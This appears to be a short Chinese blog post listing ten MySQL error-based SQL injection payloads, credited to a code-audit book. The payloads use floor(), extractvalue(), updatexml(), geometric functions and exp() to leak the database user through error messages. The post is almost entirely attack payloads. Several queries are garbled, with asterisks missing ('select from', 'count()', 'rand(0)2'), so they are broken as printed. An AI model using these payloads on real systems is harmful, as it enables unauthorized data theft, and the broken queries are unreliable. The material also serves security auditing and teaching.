以下均摘自《代码审计:企业级Web代码安全架构》一书
1.floor()
select from test where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a);
2.extractvalue()
select from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select from test where id=1 and geometrycollection((select from(select from(select user())a)b));
5.multipoint()
select from test where id=1 and multipoint((select from(select from(select user())a)b));
6.polygon()
select from test where id=1 and polygon((select from(select from(select user())a)b));
7.multipolygon()
select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8.linestring()
select from test where id=1 and linestring((select from(select from(select user())a)b));
9.multilinestring()
select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10.exp()
select from test where id=1 and exp(~(select * from(select user())a));
具体的报错原理:
https://blog.csdn.net/qq_38265674/article/details/112385897
若有收获,就点个赞吧
0 人点赞
